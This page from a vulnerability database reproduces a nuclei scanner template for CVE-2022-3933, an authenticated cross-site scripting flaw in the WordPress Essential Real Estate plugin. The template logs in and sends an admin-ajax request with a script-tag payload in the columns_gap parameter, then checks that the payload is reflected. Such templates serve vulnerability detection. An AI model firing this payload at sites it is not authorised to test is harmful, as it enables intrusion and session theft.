Lucene search
K

WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting vulnerabilit

Related
Refs
Code
id: CVE-2022-3933

info:
  name: WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks.
  impact: |
    An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks.
  remediation: Fixed in version 3.9.6.
  reference:
    - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4
    - https://wordpress.org/plugins/essential-real-estate/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3933
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-3933
    cwe-id: CWE-79
    epss-score: 0.00869
    epss-percentile: 0.54201
    cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: g5theme
    product: essential_real_estate
    framework: wordpress
  tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "><script>alert(document.domain)</script>")'
          - 'contains(body_2, "ere_property_gallery")'
        condition: and
# digest: 490a0046304402203c6befd4283198c15aad92d0d73a57d5d91476dc7595a790fcaa9b6c9b19aafb02206a3556b3a818dc4455ade5992466ca761df51a4cede97539a3d90b46267a90fb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.15.4
EPSS0.00869
SSVC
21